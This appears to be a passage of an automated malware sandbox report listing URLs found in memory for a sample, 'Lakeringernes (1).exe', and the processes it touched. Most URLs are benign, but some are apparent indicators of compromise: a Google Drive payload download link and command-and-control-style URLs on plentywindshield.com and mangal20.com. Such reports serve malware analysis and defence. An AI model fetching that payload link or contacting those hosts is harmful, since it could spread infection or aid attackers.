Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Lakeringernes (1).exe String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Lakeringernes (1).exe String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: Lakeringernes (1).exe String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: Lakeringernes (1).exe, 00000006.00000003.2191294757.0000000001976000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2293806931.0000000001976000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2181610725.000000000197A000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2299774052.0000000001976000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2182121873.000000000197A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Lakeringernes (1).exe, 00000006.00000003.2191294757.0000000001976000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2293806931.0000000001976000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2181610725.000000000197A000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2299774052.0000000001976000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2182121873.000000000197A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000000A.00000000.2752741938.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2692683855.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2514664644.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2634643315.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2685356572.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2522098316.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2745951530.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2629488305.000000000D72B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Lakeringernes (1).exe, 00000006.00000001.1985708428.0000000000649000.00000008.00000001.01000000.00000006.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: wscript.exe, 00000009.00000002.6809041803.00000000063EE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://mangal20.com/i036/?k0GP1N2=Ypm
Source: explorer.exe, 0000000A.00000000.2752741938.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2692683855.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2634643315.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2522098316.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://microsoft.co
Source: Lakeringernes (1).exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Lakeringernes (1).exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 0000000A.00000000.2752741938.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2692683855.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2514664644.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2634643315.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2685356572.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2522098316.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2745951530.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2629488305.000000000D72B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000000A.00000000.2670805599.000000000998B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2614861942.000000000998B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2498248783.000000000998B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl:)k
Source: explorer.exe, 0000000A.00000000.2752741938.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2692683855.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2634643315.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2522098316.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: wscript.exe, 00000009.00000002.6807181874.00000000052A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: Lakeringernes (1).exe String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: Lakeringernes (1).exe String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: Lakeringernes (1).exe String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: explorer.exe, 0000000A.00000000.2672548397.0000000009CC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2501251606.000000000A970000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2603807323.00000000032C0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: Lakeringernes (1).exe String found in binary or memory: http://subca.ocsp-certum.com01
Source: Lakeringernes (1).exe String found in binary or memory: http://subca.ocsp-certum.com02
Source: Lakeringernes (1).exe String found in binary or memory: http://subca.ocsp-certum.com05
Source: wscript.exe, 00000009.00000002.6807039795.0000000005116000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000000.3007711714.0000000006E56000.00000004.80000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.3015426236.0000000006E56000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.avatarworker.com/
Source: Lakeringernes (1).exe String found in binary or memory: http://www.certum.pl/CPS0
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.foreca.com
Source: Lakeringernes (1).exe, 00000006.00000001.1985708428.0000000000649000.00000008.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: Lakeringernes (1).exe, 00000006.00000001.1985503795.0000000000626000.00000008.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: wscript.exe, 00000009.00000002.6808808301.00000000060CA000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
Source: explorer.exe, 0000000A.00000000.2752741938.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2692683855.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2634643315.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2522098316.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c-
Source: wscript.exe, 00000009.00000002.6812958674.00000000075F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.plentywindshield.com/
Source: wscript.exe, 00000009.00000002.6793563494.00000000008AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.plentywindshield.com/i036/?k0GP1N2=VaB2QWBCteskeZJAX4Hj3Mdw7Sfdvkj
Source: Lakeringernes (1).exe, 00000006.00000001.1985260298.00000000005F2000.00000008.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Lakeringernes (1).exe, 00000006.00000001.1985260298.00000000005F2000.00000008.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/comments/feed/
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/feed/
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-content/themes/twentytwentytwo/style.css?ver=1.3
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/style.min.css?ver=6.1.1
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/view-modal.min.js?ver=45f05135277abf
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/view.min.js?ver=c24330f635f5cb9d5e0e
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-includes/wlwmanifest.xml
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/wp-json/
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://xn--299aa717y.xn--3e0b707e/xmlrpc.php?rsd
Source: wscript.exe, 00000009.00000002.6811526907.0000000007568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000A.00000000.2737366311.000000000D091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2505755418.000000000D091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2677982824.000000000D091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2621240275.000000000D091000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppam
Source: explorer.exe, 0000000A.00000000.2728944525.000000000989C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2613644759.000000000989C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2496890893.000000000989C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmDRIVE=C
Source: explorer.exe, 0000000A.00000000.2670805599.000000000998B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2614861942.000000000998B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2498248783.000000000998B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000A.00000000.2670805599.000000000998B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2614861942.000000000998B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2498248783.000000000998B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSe/
Source: explorer.exe, 0000000A.00000000.2677745022.000000000D073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2620995953.000000000D073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2505511824.000000000D073000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000000.2677745022.000000000D073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2620995953.000000000D073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2505511824.000000000D073000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/?
Source: explorer.exe, 0000000A.00000000.2508648461.000000000D20C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2629488305.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2599827646.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2627282062.000000000D590000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2483149352.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.2714484492.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2599827646.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2483149352.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2683214489.000000000D590000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2743569684.000000000D590000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2512098330.000000000D590000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2627282062.000000000D590000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.w.org/
Source: explorer.exe, 0000000A.00000000.2658798390.00000000032D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2603855483.00000000032D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2486384880.00000000032D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2718475264.00000000032D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comFej
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: wscript.exe, 00000009.00000003.3009393083.0000000007F38000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: wscript.exe, 00000009.00000002.6811526907.0000000007568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wscript.exe, 00000009.00000003.3009393083.0000000007F38000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: Lakeringernes (1).exe, 00000006.00000003.2181610725.000000000197A000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2182121873.000000000197A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: explorer.exe, 0000000A.00000000.2752380990.0000000010ADC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2521656962.0000000010ADC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2692413038.0000000010ADC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2634323900.0000000010ADC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Lakeringernes (1).exe, 00000006.00000002.2299774052.0000000001976000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-00-7s-docs.googleusercontent.com/
Source: Lakeringernes (1).exe, 00000006.00000003.2182121873.000000000197A000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2299626181.0000000001961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-00-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fgrm3mfa
Source: Lakeringernes (1).exe, 00000006.00000002.2298865351.00000000018F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: Lakeringernes (1).exe, 00000006.00000002.2298865351.00000000018F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/Czw
Source: Lakeringernes (1).exe, 00000006.00000002.2299465756.0000000001950000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2298865351.00000000018F8000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2315900987.000000001CBD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1qheHL7syOTquXJBrnIXPI5VTgIglBp2J
Source: Lakeringernes (1).exe, 00000006.00000002.2298865351.00000000018F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1qheHL7syOTquXJBrnIXPI5VTgIglBp2J.
Source: wscript.exe, 00000009.00000002.6811526907.0000000007568000.00000004.00000800.00020000.00000000.sdmp, 752cuCH8.9.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wscript.exe, 00000009.00000003.2948123838.00000000075D7000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6811526907.0000000007568000.00000004.00000800.00020000.00000000.sdmp, 752cuCH8.9.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wscript.exe, 00000009.00000002.6811526907.0000000007568000.00000004.00000800.00020000.00000000.sdmp, 752cuCH8.9.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 0000000A.00000000.2609321381.0000000005423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2724817110.0000000005423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2492242615.0000000005423000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000A.00000000.2514664644.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2685356572.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2745951530.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2629488305.000000000D72B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.como
Source: wscript.exe, 00000009.00000003.3009393083.0000000007F38000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: wscript.exe, 00000009.00000003.3009393083.0000000007F38000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: Lakeringernes (1).exe, 00000006.00000001.1985708428.0000000000649000.00000008.00000001.01000000.00000006.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: wscript.exe, 00000009.00000002.6807181874.00000000052A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://js.users.51.la/21461531.js
Source: wscript.exe, 00000009.00000002.6795728015.0000000000905000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6795265659.00000000008E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: wscript.exe, 00000009.00000002.6795728015.0000000000905000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6795265659.00000000008E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: wscript.exe, 00000009.00000002.6795265659.00000000008E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: wscript.exe, 00000009.00000002.6795728015.0000000000905000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6795265659.00000000008E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0
Source: explorer.exe, 0000000A.00000000.2609321381.0000000005423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2724817110.0000000005423000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2492242615.0000000005423000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.comriH
Source: explorer.exe, 0000000A.00000000.2514664644.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2685356572.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2745951530.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2629488305.000000000D72B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.comx86)
Source: explorer.exe, 0000000A.00000000.2514664644.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2685356572.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2745951530.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2629488305.000000000D72B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comCallr
Source: wscript.exe, 00000009.00000003.2948123838.00000000075D7000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6811526907.0000000007568000.00000004.00000800.00020000.00000000.sdmp, 752cuCH8.9.dr String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: wscript.exe, 00000009.00000002.6811526907.0000000007568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uk.search.yahoo.com/sugg/chrom
Source: wscript.exe, 00000009.00000003.2948123838.00000000075D7000.00000004.00000800.00020000.00000000.sdmp, 752cuCH8.9.dr String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000A.00000000.2752741938.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2692683855.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2634643315.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2522098316.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000000A.00000000.2714484492.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2599827646.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2483149352.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
